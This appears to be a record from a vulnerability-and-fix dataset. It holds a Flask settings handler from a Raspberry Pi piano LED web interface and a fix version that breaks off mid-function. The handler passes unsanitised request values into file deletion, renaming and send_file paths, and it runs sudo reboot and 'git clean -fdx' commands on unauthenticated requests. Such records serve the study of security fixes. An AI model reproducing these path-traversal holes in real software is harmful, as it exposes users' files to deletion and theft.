sequences_tree.createElement(\"sequence_name\")\n sequence_name.appendChild(sequences_tree.createTextNode(\"Sequence \" + str(sequences_amount)))\n settings.appendChild(sequence_name)\n\n step = sequences_tree.createElement(\"step_1\")\n\n color = sequences_tree.createElement(\"color\")\n color.appendChild(sequences_tree.createTextNode(\"RGB\"))\n step.appendChild(color)\n\n red = sequences_tree.createElement(\"Red\")\n red.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(red)\n\n green = sequences_tree.createElement(\"Green\")\n green.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(green)\n\n blue = sequences_tree.createElement(\"Blue\")\n blue.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(blue)\n\n light_mode = sequences_tree.createElement(\"light_mode\")\n light_mode.appendChild(sequences_tree.createTextNode(\"Normal\"))\n step.appendChild(light_mode)\n\n element = sequences_tree.createElement(\"sequence_\" + str(sequences_amount))\n element.appendChild(settings)\n element.appendChild(step)\n\n sequences_tree.getElementsByTagName(\"list\")[0].appendChild(element)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"remove_sequence\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n # removing sequence node\n nodes = sequences_tree.getElementsByTagName(\"sequence_\" + str(value))\n for node in nodes:\n parent = node.parentNode\n parent.removeChild(node)\n\n # changing nodes tag names\n i = 1\n for sequence in sequences_tree.getElementsByTagName(\"list\")[0].childNodes:\n if (sequence.nodeType == 1):\n sequences_tree.getElementsByTagName(sequence.nodeName)[0].tagName = \"sequence_\" + str(i)\n i += 1\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"add_step\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n step_amount = 1\n while True:\n if (len(sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(\n \"step_\" + str(step_amount))) == 0):\n break\n step_amount += 1\n\n step = sequences_tree.createElement(\"step_\" + str(step_amount))\n\n color = sequences_tree.createElement(\"color\")\n\n color.appendChild(sequences_tree.createTextNode(\"RGB\"))\n step.appendChild(color)\n\n red = sequences_tree.createElement(\"Red\")\n red.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(red)\n\n green = sequences_tree.createElement(\"Green\")\n green.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(green)\n\n blue = sequences_tree.createElement(\"Blue\")\n blue.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(blue)\n\n light_mode = sequences_tree.createElement(\"light_mode\")\n light_mode.appendChild(sequences_tree.createTextNode(\"Normal\"))\n step.appendChild(light_mode)\n\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].appendChild(step)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence, reload_steps_list=True)\n\n # remove node list with a tag name \"step_\" + str(value), and change tag names to maintain order\n if setting_name == \"remove_step\":\n\n second_value = int(second_value)\n second_value += 1\n\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n # removing step node\n nodes = sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(\n \"step_\" + str(second_value))\n for node in nodes:\n parent = node.parentNode\n parent.removeChild(node)\n\n # changing nodes tag names\n i = 1\n for step in sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].childNodes:\n if (step.nodeType == 1 and step.tagName != \"settings\"):\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(step.nodeName)[\n 0].tagName = \"step_\" + str(i)\n i += 1\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n # saving current led settings as sequence step\n if setting_name == \"save_led_settings_to_step\" and second_value != \"\":\n\n # remove node and child under \"sequence_\" + str(value) and \"step_\" + str(second_value)\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n second_value = int(second_value)\n second_value += 1\n\n nodes = sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(\n \"step_\" + str(second_value))\n for node in nodes:\n parent = node.parentNode\n parent.removeChild(node)\n\n # create new step node\n step = sequences_tree.createElement(\"step_\" + str(second_value))\n\n # load color mode from webinterface.ledsettings and put it into step node\n color_mode = sequences_tree.createElement(\"color\")\n color_mode.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.color_mode)))\n step.appendChild(color_mode)\n\n # load mode from webinterface.ledsettings and put it into step node\n mode = sequences_tree.createElement(\"light_mode\")\n mode.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.mode)))\n step.appendChild(mode)\n\n # if mode is equal \"Fading\" or \"Velocity\" load mode from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.mode == \"Fading\" or webinterface.ledsettings.mode == \"Velocity\"):\n fadingspeed = sequences_tree.createElement(\"fadingspeed\")\n\n # depending on fadingspeed name set different fadingspeed value\n if (webinterface.ledsettings.fadingspeed == \"Slow\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"10\"))\n elif (webinterface.ledsettings.fadingspeed == \"Medium\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"20\"))\n elif (webinterface.ledsettings.fadingspeed == \"Fast\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"40\"))\n elif (webinterface.ledsettings.fadingspeed == \"Very fast\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"50\"))\n elif (webinterface.ledsettings.fadingspeed == \"Instant\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"1000\"))\n elif (webinterface.ledsettings.fadingspeed == \"Very slow\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"2\"))\n\n step.appendChild(fadingspeed)\n\n # if color_mode is equal to \"Single\" load color from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Single\"):\n red = sequences_tree.createElement(\"Red\")\n red.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.red)))\n step.appendChild(red)\n\n green = sequences_tree.createElement(\"Green\")\n green.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.green)))\n step.appendChild(green)\n\n blue = sequences_tree.createElement(\"Blue\")\n blue.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.blue)))\n step.appendChild(blue)\n\n # if color_mode is equal to \"Multicolor\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Multicolor\"):\n # load value from webinterface.ledsettings.multicolor\n multicolor = webinterface.ledsettings.multicolor\n\n # loop through multicolor object and add each color to step node under \"sequence_\"+str(value) with tag name \"color_\"+str(i)\n for i in range(len(multicolor)):\n color = sequences_tree.createElement(\"color_\" + str(i + 1))\n new_multicolor = str(multicolor[i])\n new_multicolor = new_multicolor.replace(\"[\", \"\")\n new_multicolor = new_multicolor.replace(\"]\", \"\")\n\n color.appendChild(sequences_tree.createTextNode(new_multicolor))\n step.appendChild(color)\n\n # same as above but with multicolor_range and \"color_range_\"+str(i)\n multicolor_range = webinterface.ledsettings.multicolor_range\n for i in range(len(multicolor_range)):\n color_range = sequences_tree.createElement(\"color_range_\" + str(i + 1))\n new_multicolor_range = str(multicolor_range[i])\n\n new_multicolor_range = new_multicolor_range.replace(\"[\", \"\")\n new_multicolor_range = new_multicolor_range.replace(\"]\", \"\")\n color_range.appendChild(sequences_tree.createTextNode(new_multicolor_range))\n step.appendChild(color_range)\n\n # if color_mode is equal to \"Rainbow\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Rainbow\"):\n # load values rainbow_offset, rainbow_scale and rainbow_timeshift from webinterface.ledsettings and put them into step node under Offset, Scale and Timeshift\n rainbow_offset = sequences_tree.createElement(\"Offset\")\n rainbow_offset.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.rainbow_offset)))\n step.appendChild(rainbow_offset)\n\n rainbow_scale = sequences_tree.createElement(\"Scale\")\n rainbow_scale.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.rainbow_scale)))\n step.appendChild(rainbow_scale)\n\n rainbow_timeshift = sequences_tree.createElement(\"Timeshift\")\n rainbow_timeshift.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.rainbow_timeshift)))\n step.appendChild(rainbow_timeshift)\n\n # if color_mode is equal to \"Speed\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Speed\"):\n # load values speed_slowest[\"red\"] etc from webinterface.ledsettings and put them under speed_slowest_red etc\n speed_slowest_red = sequences_tree.createElement(\"speed_slowest_red\")\n speed_slowest_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_slowest[\"red\"])))\n step.appendChild(speed_slowest_red)\n\n speed_slowest_green = sequences_tree.createElement(\"speed_slowest_green\")\n speed_slowest_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_slowest[\"green\"])))\n step.appendChild(speed_slowest_green)\n\n speed_slowest_blue = sequences_tree.createElement(\"speed_slowest_blue\")\n speed_slowest_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_slowest[\"blue\"])))\n step.appendChild(speed_slowest_blue)\n\n # same as above but with \"fastest\"\n speed_fastest_red = sequences_tree.createElement(\"speed_fastest_red\")\n speed_fastest_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_fastest[\"red\"])))\n step.appendChild(speed_fastest_red)\n\n speed_fastest_green = sequences_tree.createElement(\"speed_fastest_green\")\n speed_fastest_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_fastest[\"green\"])))\n step.appendChild(speed_fastest_green)\n\n speed_fastest_blue = sequences_tree.createElement(\"speed_fastest_blue\")\n speed_fastest_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_fastest[\"blue\"])))\n step.appendChild(speed_fastest_blue)\n\n # load \"speed_max_notes\" and \"speed_period_in_seconds\" values from webinterface.ledsettings\n # and put them under speed_max_notes and speed_period_in_seconds\n\n speed_max_notes = sequences_tree.createElement(\"speed_max_notes\")\n speed_max_notes.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.speed_max_notes)))\n step.appendChild(speed_max_notes)\n\n speed_period_in_seconds = sequences_tree.createElement(\"speed_period_in_seconds\")\n speed_period_in_seconds.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_period_in_seconds)))\n step.appendChild(speed_period_in_seconds)\n\n # if color_mode is equal to \"Gradient\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Gradient\"):\n # load values gradient_start_red etc from webinterface.ledsettings and put them under gradient_start_red etc\n gradient_start_red = sequences_tree.createElement(\"gradient_start_red\")\n gradient_start_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_start[\"red\"])))\n step.appendChild(gradient_start_red)\n\n gradient_start_green = sequences_tree.createElement(\"gradient_start_green\")\n gradient_start_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_start[\"green\"])))\n step.appendChild(gradient_start_green)\n\n gradient_start_blue = sequences_tree.createElement(\"gradient_start_blue\")\n gradient_start_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_start[\"blue\"])))\n step.appendChild(gradient_start_blue)\n\n # same as above but with gradient_end\n gradient_end_red = sequences_tree.createElement(\"gradient_end_red\")\n gradient_end_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_end[\"red\"])))\n step.appendChild(gradient_end_red)\n\n gradient_end_green = sequences_tree.createElement(\"gradient_end_green\")\n gradient_end_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_end[\"green\"])))\n step.appendChild(gradient_end_green)\n\n gradient_end_blue = sequences_tree.createElement(\"gradient_end_blue\")\n gradient_end_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_end[\"blue\"])))\n step.appendChild(gradient_end_blue)\n\n # if color_mode is equal to \"Scale\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Scale\"):\n # load values key_in_scale_red etc from webinterface.ledsettings and put them under key_in_scale_red etc\n key_in_scale_red = sequences_tree.createElement(\"key_in_scale_red\")\n key_in_scale_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_in_scale[\"red\"])))\n step.appendChild(key_in_scale_red)\n\n key_in_scale_green = sequences_tree.createElement(\"key_in_scale_green\")\n key_in_scale_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_in_scale[\"green\"])))\n step.appendChild(key_in_scale_green)\n\n key_in_scale_blue = sequences_tree.createElement(\"key_in_scale_blue\")\n key_in_scale_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_in_scale[\"blue\"])))\n step.appendChild(key_in_scale_blue)\n\n # same as above but with key_not_in_scale\n key_not_in_scale_red = sequences_tree.createElement(\"key_not_in_scale_red\")\n key_not_in_scale_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_not_in_scale[\"red\"])))\n step.appendChild(key_not_in_scale_red)\n\n key_not_in_scale_green = sequences_tree.createElement(\"key_not_in_scale_green\")\n key_not_in_scale_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_not_in_scale[\"green\"])))\n step.appendChild(key_not_in_scale_green)\n\n key_not_in_scale_blue = sequences_tree.createElement(\"key_not_in_scale_blue\")\n key_not_in_scale_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_not_in_scale[\"blue\"])))\n step.appendChild(key_not_in_scale_blue)\n\n try:\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[\n 0].insertBefore(step,\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[\n 0].getElementsByTagName(\"step_\" + str(second_value + 1))[0])\n except:\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].appendChild(step)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence, reload_steps_list=True)\n\n if setting_name == \"screen_on\":\n if (int(value) == 0):\n webinterface.menu.disable_screen()\n else:\n webinterface.menu.enable_screen()\n\n if setting_name == \"reset_to_default\":\n webinterface.usersettings.reset_to_default()\n\n if setting_name == \"restart_rpi\":\n call(\"sudo /sbin/reboot now\", shell=True)\n\n if setting_name == \"turnoff_rpi\":\n call(\"sudo /sbin/shutdown -h now\", shell=True)\n\n if setting_name == \"update_rpi\":\n call(\"sudo git reset --hard HEAD\", shell=True)\n call(\"sudo git checkout .\", shell=True)\n call(\"sudo git clean -fdx\", shell=True)\n call(\"sudo git pull origin master\", shell=True)\n\n if setting_name == \"connect_ports\":\n webinterface.midiports.connectall()\n return jsonify(success=True, reload_ports=True)\n\n if setting_name == \"disconnect_ports\":\n call(\"sudo aconnect -x\", shell=True)\n return jsonify(success=True, reload_ports=True)\n\n if setting_name == \"restart_rtp\":\n call(\"sudo systemctl restart rtpmidid\", shell=True)\n\n if setting_name == \"start_recording\":\n webinterface.saving.start_recording()\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"cancel_recording\":\n webinterface.saving.cancel_recording()\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"save_recording\":\n now = datetime.datetime.now()\n current_date = now.strftime(\"%Y-%m-%d %H:%M\")\n webinterface.saving.save(current_date)\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"change_song_name\":\n if os.path.exists(\"Songs/\" + second_value):\n return jsonify(success=False, reload_songs=True, error=second_value + \" already exists\")\n\n if \"_main\" in value:\n search_name = value.replace(\"_main.mid\", \"\")\n for fname in os.listdir('Songs'):\n if search_name in fname:\n new_name = second_value.replace(\".mid\", \"\") + fname.replace(search_name, \"\")\n os.rename('Songs/' + fname, 'Songs/' + new_name)\n else:\n os.rename('Songs/' + value, 'Songs/' + second_value)\n os.rename('Songs/cache/' + value + \".p\", 'Songs/cache/' + second_value + \".p\")\n\n\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"remove_song\":\n if \"_main\" in value:\n name_no_suffix = value.replace(\"_main.mid\", \"\")\n for fname in os.listdir('Songs'):\n if name_no_suffix in fname:\n os.remove(\"Songs/\" + fname)\n else:\n os.remove(\"Songs/\" + value)\n\n file_types = [\".musicxml\", \".xml\", \".mxl\", \".abc\"]\n for file_type in file_types:\n try:\n os.remove(\"Songs/\" + value.replace(\".mid\", file_type))\n except:\n pass\n\n try:\n os.remove(\"Songs/cache/\" + value + \".p\")\n except:\n print(\"No cache file for \" + value)\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"download_song\":\n if \"_main\" in value:\n zipObj = ZipFile(\"Songs/\" + value.replace(\".mid\", \"\") + \".zip\", 'w')\n name_no_suffix = value.replace(\"_main.mid\", \"\")\n songs_count = 0\n for fname in os.listdir('Songs'):\n if name_no_suffix in fname and \".zip\" not in fname:\n songs_count += 1\n zipObj.write(\"Songs/\" + fname)\n zipObj.close()\n if songs_count == 1:\n os.remove(\"Songs/\" + value.replace(\".mid\", \"\") + \".zip\")\n return send_file(\"../Songs/\" + value, mimetype='application/x-csv', attachment_filename=value,\n as_attachment=True)\n else:\n return send_file(\"../Songs/\" + value.replace(\".mid\", \"\") + \".zip\", mimetype='application/x-csv',\n attachment_filename=value.replace(\".mid\", \"\") + \".zip\", as_attachment=True)\n else:\n return send_file(\"../Songs/\" + value, mimetype='application/x-csv', attachment_filename=value,\n as_attachment=True)\n\n if setting_name == \"download_sheet_music\":\n file_types = [\".musicxml\", \".xml\", \".mxl\", \".abc\"]\n i = 0\n while i < len(file_types):\n try:\n new_name = value.replace(\".mid\", file_types[i])\n return send_file(\"../Songs/\" + new_name, mimetype='application/x-csv', attachment_filename=new_name,\n as_attachment=True)\n except:\n i += 1\n webinterface.learning.convert_midi_to_abc(value)\n try:\n return send_file(\"../Songs/\" + value.replace(\".mid\", \".abc\"), mimetype='application/x-csv',\n attachment_filename=value.replace(\".mid\", \".abc\"), as_attachment=True)\n except:\n print(\"Converting failed\")\n\n\n if setting_name == \"start_midi_play\":\n webinterface.saving.t = threading.Thread(target=play_midi, args=(value, webinterface.midiports,\n webinterface.saving, webinterface.menu,\n webinterface.ledsettings,\n webinterface.ledstrip))\n webinterface.saving.t.start()\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"stop_midi_play\":\n webinterface.saving.is_playing_midi.clear()\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"learning_load_song\":\n webinterface.learning.t = threading.Thread(target=webinterface.learning.load_midi, args=(value,))\n webinterface.learning.t.start()\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"start_learning_song\":\n webinterface.learning.t = threading.Thread(target=webinterface.learning.learn_midi)\n webinterface.learning.t.start()\n\n return jsonify(success=True)\n\n if setting_name == \"stop_learning_song\":\n webinterface.learning.is_started_midi = False\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n return jsonify(success=True)\n\n if setting_name == \"change_practice\":\n value = int(value)\n webinterface.learning.practice = value\n webinterface.learning.practice = clamp(webinterface.learning.practice, 0, len(webinterface.learning.practiceList) - 1)\n webinterface.usersettings.change_setting_value(\"practice\", webinterface.learning.practice)\n\n return jsonify(success=True)\n\n if setting_name == \"change_tempo\":\n value = int(value)\n webinterface.learning.set_tempo = value\n webinterface.learning.set_tempo = clamp(webinterface.learning.set_tempo, 10, 200)\n webinterface.usersettings.change_setting_value(\"set_tempo\", webinterface.learning.set_tempo)\n\n return jsonify(success=True)\n\n if setting_name == \"change_hands\":\n value = int(value)\n webinterface.learning.hands = value\n webinterface.learning.hands = clamp(webinterface.learning.hands, 0, len(webinterface.learning.handsList) - 1)\n webinterface.usersettings.change_setting_value(\"hands\", webinterface.learning.hands)\n\n return jsonify(success=True)\n\n if setting_name == \"change_mute_hand\":\n value = int(value)\n webinterface.learning.mute_hand = value\n webinterface.learning.mute_hand = clamp(webinterface.learning.mute_hand, 0, len(webinterface.learning.mute_handList) - 1)\n webinterface.usersettings.change_setting_value(\"mute_hand\", webinterface.learning.mute_hand)\n\n return jsonify(success=True)\n\n if setting_name == \"learning_start_point\":\n value = int(value)\n webinterface.learning.start_point = value\n webinterface.learning.start_point = clamp(webinterface.learning.start_point, 0, webinterface.learning.end_point - 1)\n webinterface.usersettings.change_setting_value(\"start_point\", webinterface.learning.start_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True)\n\n if setting_name == \"learning_end_point\":\n value = int(value)\n webinterface.learning.end_point = value\n webinterface.learning.end_point = clamp(webinterface.learning.end_point, webinterface.learning.start_point + 1, 100)\n webinterface.usersettings.change_setting_value(\"end_point\", webinterface.learning.end_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True)\n\n if setting_name == \"set_current_time_as_start_point\":\n webinterface.learning.start_point = round(float(webinterface.learning.current_idx * 100 / float(len(webinterface.learning.song_tracks))), 3)\n webinterface.learning.start_point = clamp(webinterface.learning.start_point, 0, webinterface.learning.end_point - 1)\n webinterface.usersettings.change_setting_value(\"start_point\", webinterface.learning.start_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"set_current_time_as_end_point\":\n webinterface.learning.end_point = round(float(webinterface.learning.current_idx * 100 / float(len(webinterface.learning.song_tracks))), 3)\n webinterface.learning.end_point = clamp(webinterface.learning.end_point, webinterface.learning.start_point + 1, 100)\n webinterface.usersettings.change_setting_value(\"end_point\", webinterface.learning.end_point)\n webinterface.learning.restart_learning()\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"change_handL_color\":\n value = int(value)\n webinterface.learning.hand_colorL += value\n webinterface.learning.hand_colorL = clamp(webinterface.learning.hand_colorL, 0, len(webinterface.learning.hand_colorList) - 1)\n webinterface.usersettings.change_setting_value(\"hand_colorL\", webinterface.learning.hand_colorL)\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"change_handR_color\":\n value = int(value)\n webinterface.learning.hand_colorR += value\n webinterface.learning.hand_colorR = clamp(webinterface.learning.hand_colorR, 0, len(webinterface.learning.hand_colorList) - 1)\n webinterface.usersettings.change_setting_value(\"hand_colorR\", webinterface.learning.hand_colorR)\n\n return jsonify(success=True, reload_learning_settings=True)\n\n if setting_name == \"change_learning_loop\":\n value = int(value == 'true')\n webinterface.learning.is_loop_active = value\n webinterface.usersettings.change_setting_value(\"is_loop_active\", webinterface.learning.is_loop_active)\n\n return jsonify(success=True)\n\n\n return jsonify(success=True)"}], "fix_func": [{"id": "fix_py_105_1", "commit": "3f10602", "file_path": "webinterface/views_api.py", "start_line": "146", "end_line": "1115", "snippet": "def change_setting():\n setting_name = request.args.get('setting_name')\n value = request.args.get('value')\n second_value = request.args.get('second_value')\n disable_sequence = request.args.get('disable_sequence')\n\n reload_sequence = True\n if (second_value == \"no_reload\"):\n reload_sequence = False\n\n if (disable_sequence == \"true\"):\n webinterface.ledsettings.__init__(webinterface.usersettings)\n webinterface.ledsettings.sequence_active = False\n\n if setting_name == \"clean_ledstrip\":\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n if setting_name == \"led_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n\n webinterface.ledsettings.color_mode = \"Single\"\n\n webinterface.ledsettings.red = rgb[0]\n webinterface.ledsettings.green = rgb[1]\n webinterface.ledsettings.blue = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"color_mode\", webinterface.ledsettings.color_mode)\n webinterface.usersettings.change_setting_value(\"red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"light_mode\":\n webinterface.ledsettings.mode = value\n webinterface.usersettings.change_setting_value(\"mode\", value)\n\n if setting_name == \"fading_speed\" or setting_name == \"velocity_speed\":\n webinterface.ledsettings.fadingspeed = int(value)\n webinterface.usersettings.change_setting_value(\"fadingspeed\", webinterface.ledsettings.fadingspeed)\n\n if setting_name == \"brightness\":\n webinterface.usersettings.change_setting_value(\"brightness_percent\", int(value))\n webinterface.ledstrip.change_brightness(int(value), True)\n\n if setting_name == \"backlight_brightness\":\n webinterface.ledsettings.backlight_brightness_percent = int(value)\n webinterface.ledsettings.backlight_brightness = 255 * webinterface.ledsettings.backlight_brightness_percent / 100\n webinterface.usersettings.change_setting_value(\"backlight_brightness\",\n int(webinterface.ledsettings.backlight_brightness))\n webinterface.usersettings.change_setting_value(\"backlight_brightness_percent\",\n webinterface.ledsettings.backlight_brightness_percent)\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n if setting_name == \"backlight_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n\n webinterface.ledsettings.backlight_red = rgb[0]\n webinterface.ledsettings.backlight_green = rgb[1]\n webinterface.ledsettings.backlight_blue = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"backlight_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"backlight_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"backlight_blue\", rgb[2])\n\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n if setting_name == \"sides_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n\n webinterface.ledsettings.adjacent_red = rgb[0]\n webinterface.ledsettings.adjacent_green = rgb[1]\n webinterface.ledsettings.adjacent_blue = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"adjacent_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"adjacent_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"adjacent_blue\", rgb[2])\n\n if setting_name == \"sides_color_mode\":\n webinterface.ledsettings.adjacent_mode = value\n webinterface.usersettings.change_setting_value(\"adjacent_mode\", value)\n\n if setting_name == \"input_port\":\n webinterface.usersettings.change_setting_value(\"input_port\", value)\n webinterface.midiports.change_port(\"inport\", value)\n\n if setting_name == \"secondary_input_port\":\n webinterface.usersettings.change_setting_value(\"secondary_input_port\", value)\n\n if setting_name == \"play_port\":\n webinterface.usersettings.change_setting_value(\"play_port\", value)\n webinterface.midiports.change_port(\"playport\", value)\n\n if setting_name == \"skipped_notes\":\n webinterface.usersettings.change_setting_value(\"skipped_notes\", value)\n webinterface.ledsettings.skipped_notes = value\n\n if setting_name == \"add_note_offset\":\n webinterface.ledsettings.add_note_offset()\n return jsonify(success=True, reload=True)\n\n if setting_name == \"append_note_offset\":\n webinterface.ledsettings.append_note_offset()\n return jsonify(success=True, reload=True)\n\n if setting_name == \"remove_note_offset\":\n webinterface.ledsettings.del_note_offset(int(value) + 1)\n return jsonify(success=True, reload=True)\n\n if setting_name == \"note_offsets\":\n webinterface.usersettings.change_setting_value(\"note_offsets\", value)\n\n if setting_name == \"update_note_offset\":\n webinterface.ledsettings.update_note_offset(int(value) + 1, second_value)\n return jsonify(success=True, reload=True)\n\n if setting_name == \"led_count\":\n webinterface.usersettings.change_setting_value(\"led_count\", int(value))\n webinterface.ledstrip.change_led_count(int(value), True)\n\n if setting_name == \"shift\":\n webinterface.usersettings.change_setting_value(\"shift\", int(value))\n webinterface.ledstrip.change_shift(int(value), True)\n\n if setting_name == \"reverse\":\n webinterface.usersettings.change_setting_value(\"reverse\", int(value))\n webinterface.ledstrip.change_reverse(int(value), True)\n\n if setting_name == \"color_mode\":\n reload_sequence = True\n if (second_value == \"no_reload\"):\n reload_sequence = False\n\n webinterface.ledsettings.color_mode = value\n webinterface.usersettings.change_setting_value(\"color_mode\", webinterface.ledsettings.color_mode)\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"add_multicolor\":\n webinterface.ledsettings.addcolor()\n return jsonify(success=True, reload=True)\n\n if setting_name == \"add_multicolor_and_set_value\":\n settings = json.loads(value)\n\n webinterface.ledsettings.multicolor.clear()\n webinterface.ledsettings.multicolor_range.clear()\n\n for key, value in settings.items():\n rgb = wc.hex_to_rgb(\"#\" + value[\"color\"])\n\n webinterface.ledsettings.multicolor.append([int(rgb[0]), int(rgb[1]), int(rgb[2])])\n webinterface.ledsettings.multicolor_range.append([int(value[\"range\"][0]), int(value[\"range\"][1])])\n\n webinterface.usersettings.change_setting_value(\"multicolor\", webinterface.ledsettings.multicolor)\n webinterface.usersettings.change_setting_value(\"multicolor_range\",\n webinterface.ledsettings.multicolor_range)\n\n return jsonify(success=True)\n\n if setting_name == \"remove_multicolor\":\n webinterface.ledsettings.deletecolor(int(value) + 1)\n return jsonify(success=True, reload=True)\n\n if setting_name == \"multicolor\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.multicolor[int(second_value)][0] = rgb[0]\n webinterface.ledsettings.multicolor[int(second_value)][1] = rgb[1]\n webinterface.ledsettings.multicolor[int(second_value)][2] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"multicolor\", webinterface.ledsettings.multicolor)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"multicolor_range_left\":\n webinterface.ledsettings.multicolor_range[int(second_value)][0] = int(value)\n webinterface.usersettings.change_setting_value(\"multicolor_range\", webinterface.ledsettings.multicolor_range)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"multicolor_range_right\":\n webinterface.ledsettings.multicolor_range[int(second_value)][1] = int(value)\n webinterface.usersettings.change_setting_value(\"multicolor_range\", webinterface.ledsettings.multicolor_range)\n\n return jsonify(success=True, 